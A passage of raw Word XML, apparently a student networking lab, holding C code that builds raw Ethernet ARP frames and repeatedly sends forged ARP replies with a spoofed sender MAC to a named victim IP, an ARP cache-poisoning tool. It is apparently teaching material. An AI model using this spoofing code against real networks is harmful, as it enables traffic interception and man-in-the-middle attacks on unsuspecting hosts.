interface.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((sd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))&lt;0){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perror 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"socket() failed to get socket descriptor for using ioctl()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exit(EXIT_FAILURE);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Use ioctl() to look up interface name and get its MAC address.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memset(&amp;ifr,0,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sizeof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(ifr));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snprintf(ifr.ifr_name,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sizeof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(ifr.ifr_name),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"%s"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interface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(ioctl(sd,SIOCGIFHWADDR,&amp;ifr)&lt;0){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perror(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"ioctl() failed to get source MAC address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(EXIT_FAILURE);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close(sd);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Copy source MAC address.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memcpy(src_mac,ifr.ifr_hwaddr.sa_data,6 *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sizeof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(uint8_t));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Report source MAC address to stdout.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printf(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"MAC address for interface %s is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interface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for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(i=0;i&lt;5;i++){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printf(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"%02x:"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,src_mac[i]);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printf(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"%02x\n"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,src_mac[5]);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Find interface index from interface name and store index in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struct sockaddr_ll device, which will be used as an argument of sendto().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memset(&amp;device,0,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sizeof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(device));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((device.sll_ifindex=if_nametoindex(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interface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))==0){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perror(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"if_nametoindex() failed to obtain interface index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exit(EXIT_FAILURE);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printf(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"Index for interface %s is %i\n"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interface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,device.sll_ifindex);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Set destination MAC address: broadcast address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lastRenderedPageBreak/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memset (dst_mac, 0xff, 6 * sizeof (uint8_t)); 00:1f:d0:0f:98:77 MAC of 192.168.181.132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/************************/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//int values[6],i;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(6==sscanf(argv[5],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"%x:%x:%x:%x:%x:%x%*c"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,&amp;values[0],&amp;values[1],&amp;values[2],&amp;values[3],&amp;values[4],&amp;values[5])){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for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(i=0;i&lt;6;i++){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dst_mac[i]=(uint8_t) values[i];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else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perror(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"Invalid MAC address\n"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exit(-1);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//./sendarp &lt;iface_name&gt; &lt;attacker_ip&gt; &lt;attacker_mac&gt; &lt;victim_ip&gt; &lt;mac_to_be_spoofed&gt;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/************************/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//dst_mac[0]=0x00;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//dst_mac[1]=0x1f;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//dst_mac[2]=0xd0;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//dst_mac[3]=0x0f;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//dst_mac[4]=0x98;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//dst_mac[5]=0x77; //changed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Source IPv4 address: you need to fill this out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//strcpy (src_ip, "192.168.1.116");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strcpy (src_ip, "192.168.181.125");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strcpy(src_ip, argv[2]);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Destination URL or IPv4 address (must be a link-local node): you need to fill this out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//strcpy (target, "192.168.1.1");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strcpy(target, argv[4]);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Fill out hints for getaddrinfo().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memset(&amp;hints, 0,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sizeof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struct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addrinfo));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hints.ai_family = AF_INET;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hints.ai_socktype = SOCK_STREAM;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hints.ai_flags = hints.ai_flags | AI_CANONNAME;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Source IP address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((status = inet_pton (AF_INET, src_ip, &amp;arphdr.sender_ip)) != 1){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fprintf (stderr,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"inet_pton() failed for source IP address.\nError message: %s"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, strerror (status));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exit (EXIT_FAILURE);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Resolve target using getaddrinfo().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((status = getaddrinfo (target, NULL, &amp;hints, &amp;res)) != 0){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fprintf(stderr, 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"getaddrinfo() failed: %s\n"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, gai_strerror (status));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exit(EXIT_FAILURE);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ipv4 = (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struct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sockaddr_in *) res-&gt;ai_addr;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memcpy(&amp;arphdr.target_ip, &amp;ipv4-&gt;sin_addr, 4 *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sizeof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(uint8_t));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freeaddrinfo (res);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Fill out sockaddr_ll.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device.sll_family = AF_PACKET;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memcpy(device.sll_addr, src_mac, 6 *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sizeof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(uint8_t));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device.sll_halen = 6;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printf(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"device prepared\n"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ARP header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Hardware type (16 bits): 1 for ethernet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arphdr.htype = htons (1);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Protocol type (16 bits): 2048 for IP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arphdr.ptype = htons (ETH_P_IP);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Hardware address length (8 bits): 6 bytes for MAC address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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        arphdr.hlen = 6;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Protocol address length (8 bits): 4 bytes for IPv4 address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arphdr.plen = 4;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OpCode: 1 for ARP request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arphdr.opcode = htons (ARPOP_REQUEST);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OpCode: 2 for ARP request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arphdr.opcode = htons (ARPOP_REPLY);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//changed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Sender hardware address (48 bits): MAC address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memcpy (&amp;arphdr.sender_mac, src_mac, 6 * sizeof (uint8_t));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memcpy (&amp;arphdr.sender_mac, src_mac1, 6 *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sizeof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(uint8_t));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//changed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Sender protocol address (32 bits)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See getaddrinfo() resolution of src_ip.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Target hardware address (48 bits): zero, since we don't know it yet.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//memset (&amp;arphdr.target_mac, 0, 6 * sizeof (uint8_t));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memcpy (&amp;arphdr.target_mac, dst_mac, 6 *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sizeof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(uint8_t));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//changed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Target protocol address (32 bits)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See getaddrinfo() resolution of target.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Fill out ethernet frame header.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Ethernet frame length = ethernet header (MAC + MAC + ethernet type) + ethernet data (ARP header)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frame_length = 6 + 6 + 2 + ARP_HDRLEN;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Destination and Source MAC addresses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memcpy (ether_frame, dst_mac, 6 *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sizeof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(uint8_t));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memcpy (ether_frame + 6, src_mac, 6 *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sizeof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(uint8_t));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Next is ethernet type code (ETH_P_ARP for ARP).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http://www.iana.org/assignments/ethernet-numbers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ether_frame[12] = ETH_P_ARP / 256;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ether_frame[13] = ETH_P_ARP % 256;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Next is ethernet frame data (ARP header).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ARP header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memcpy (ether_frame + ETH_HDRLEN, &amp;arphdr, ARP_HDRLEN *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sizeof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(uint8_t));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printf(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"packetprepared\n"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Submit request for a raw socket descriptor.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((sd = socket (PF_PACKET, SOCK_RAW, htons (ETH_P_ALL))) &lt; 0) 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perror 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"socket() failed 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exit (EXIT_FAILURE);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printf(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"socket opened\n"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for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(i=0;i&lt;atoi(argv[6]);i++){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Send ethernet frame to socket.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((bytes = sendto (sd, ether_frame, frame_length, 0, (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struct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sockaddr *) &amp;device,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sizeof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(device))) &lt;= 0) {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perror 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"sendto() failed"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    exit (EXIT_FAILURE);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    printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"%d bytes sent\n"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, bytes);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// Close socket descriptor.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 close (sd);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}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return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(EXIT_SUCCESS);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AA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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB7AAE" w:rsidRPr="005D773A" w:rsidRDefault="00FB7AAE" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001258A4" w:rsidRPr="00B17365" w:rsidRDefault="001258A4" w:rsidP="00FB7AAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001258A4" w:rsidRPr="00B17365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EC8" w:rsidRDefault="00AA0EC8" w:rsidP="00904EEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AA0EC8" w:rsidRDefault="00AA0EC8" w:rsidP="00904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8177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7AAE" w:rsidRDefault="00FB7AA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6692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B7AAE" w:rsidRDefault="00FB7A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EC8" w:rsidRDefault="00AA0EC8" w:rsidP="00904EEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00AA0EC8" w:rsidRDefault="00AA0EC8" w:rsidP="00904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6E0427"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E3AFB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12B"/>
    <w:rsid w:val="000A1401"/>
    <w:rsid w:val="000F1440"/>
    <w:rsid w:val="000F2CFA"/>
    <w:rsid w:val="001153E3"/>
    <w:rsid w:val="00117641"/>
    <w:rsid w:val="001258A4"/>
    <w:rsid w:val="001260A2"/>
    <w:rsid w:val="00126FCA"/>
    <w:rsid w:val="001360B9"/>
    <w:rsid w:val="00161F8B"/>
    <w:rsid w:val="001D0B27"/>
    <w:rsid w:val="00222A35"/>
    <w:rsid w:val="00237D07"/>
    <w:rsid w:val="00254AD3"/>
    <w:rsid w:val="00291B1A"/>
    <w:rsid w:val="002A32C2"/>
    <w:rsid w:val="003020B3"/>
    <w:rsid w:val="003205A5"/>
    <w:rsid w:val="00342675"/>
    <w:rsid w:val="003504E8"/>
    <w:rsid w:val="00387224"/>
    <w:rsid w:val="00394EE4"/>
    <w:rsid w:val="003A46FC"/>
    <w:rsid w:val="003B60F7"/>
    <w:rsid w:val="003E3590"/>
    <w:rsid w:val="00440F29"/>
    <w:rsid w:val="004646EB"/>
    <w:rsid w:val="004D210D"/>
    <w:rsid w:val="004E365E"/>
    <w:rsid w:val="00511CE8"/>
    <w:rsid w:val="005619CE"/>
    <w:rsid w:val="00576DA4"/>
    <w:rsid w:val="00591C9A"/>
    <w:rsid w:val="00593B99"/>
    <w:rsid w:val="006210A0"/>
    <w:rsid w:val="0062541F"/>
    <w:rsid w:val="007277C7"/>
    <w:rsid w:val="00792E22"/>
    <w:rsid w:val="007B6481"/>
    <w:rsid w:val="007E07E1"/>
    <w:rsid w:val="007E7C27"/>
    <w:rsid w:val="007F5CA6"/>
    <w:rsid w:val="00802CCA"/>
    <w:rsid w:val="00812FF9"/>
    <w:rsid w:val="00830243"/>
    <w:rsid w:val="008B6692"/>
    <w:rsid w:val="008F0B2D"/>
    <w:rsid w:val="00904EEC"/>
    <w:rsid w:val="00954972"/>
    <w:rsid w:val="009656B5"/>
    <w:rsid w:val="0097714C"/>
    <w:rsid w:val="00985E9B"/>
    <w:rsid w:val="009D02CA"/>
    <w:rsid w:val="009E2356"/>
    <w:rsid w:val="00A0356A"/>
    <w:rsid w:val="00A23947"/>
    <w:rsid w:val="00A92244"/>
    <w:rsid w:val="00AA0EC8"/>
    <w:rsid w:val="00AA6126"/>
    <w:rsid w:val="00AA6BF9"/>
    <w:rsid w:val="00AC1226"/>
    <w:rsid w:val="00AE2C0F"/>
    <w:rsid w:val="00B17365"/>
    <w:rsid w:val="00B42BB2"/>
    <w:rsid w:val="00B46CB2"/>
    <w:rsid w:val="00BC036E"/>
    <w:rsid w:val="00BC1A05"/>
    <w:rsid w:val="00BD74E1"/>
    <w:rsid w:val="00BE55C0"/>
    <w:rsid w:val="00BE6329"/>
    <w:rsid w:val="00C1598E"/>
    <w:rsid w:val="00C159C6"/>
    <w:rsid w:val="00C44EF2"/>
    <w:rsid w:val="00CC0FC4"/>
    <w:rsid w:val="00CC37D9"/>
    <w:rsid w:val="00CE512B"/>
    <w:rsid w:val="00D0288E"/>
    <w:rsid w:val="00D303EB"/>
    <w:rsid w:val="00D80BAD"/>
    <w:rsid w:val="00D97525"/>
    <w:rsid w:val="00DF7CD5"/>
    <w:rsid w:val="00E413A4"/>
    <w:rsid w:val="00E50E5B"/>
    <w:rsid w:val="00E55134"/>
    <w:rsid w:val="00E87C1B"/>
    <w:rsid w:val="00EA2A01"/>
    <w:rsid w:val="00EB1288"/>
    <w:rsid w:val="00F04590"/>
    <w:rsid w:val="00F4328F"/>
    <w:rsid w:val="00F436A4"/>
    <w:rsid w:val="00F91A8A"/>
    <w:rsid w:val="00F96661"/>
    <w:rsid w:val="00FB6135"/>
    <w:rsid w:val="00FB7AAE"/>
    <w:rsid w:val="00FE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3A3231-D74C-4F75-8E12-E3FBD915D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4E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4E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4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A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1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A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4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EEC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00904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EEC"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B17365"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nowrap">
    <w:name w:val="nowrap"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B17365"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00C44EF2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00C44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4E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44E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44EF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3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3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9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6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8036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54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77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6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1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2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2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1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99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59334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6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9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52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6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2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5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52705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63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0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2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20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oogle.com'a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en.wikipedia.org/wiki/Frame_check_sequence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en.wikipedia.org/wiki/Address_Resolution_Protocol" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Frame_check_sequenc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en.wikipedia.org/wiki/IEEE_802.3" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/IEEE_802.3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en.wikipedia.org/wiki/Ethernet_frame" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Octet_(computing)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en.wikipedia.org/wiki/Ethernet_II" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ethernet_II" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Octet_(computing)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en.wikipedia.org/wiki/Ethertype" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Interpacket_gap" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Interpacket_gap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yperlink" Target="https://en.wikipedia.org/wiki/Ethertyp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en.wikipedia.org/wiki/802.1Q" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cyclic_redundancy_check" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/802.1Q" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cyclic_redundancy_che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9D528F4FD63C4280932C3D6B75B959" ma:contentTypeVersion="" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f526e9d60bb3aacf2fea7b4a77cb75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937016-9F30-40B4-9A0D-B08EC6619838}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{89F06CF5-0589-49F3-8C46-91B2BBC4A6DC}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DCB0A80D-B017-439A-80BA-F7FD0F41DE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2561</Words>
  <Characters>14602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cmpe1</dc:creator>
  <cp:lastModifiedBy>Gürcü</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-22T07:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-04T13:51:00Z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0x010100059D528F4FD63C4280932C3D6B75B959</vt:lpwstr>
  </property>
</Properties>
</file>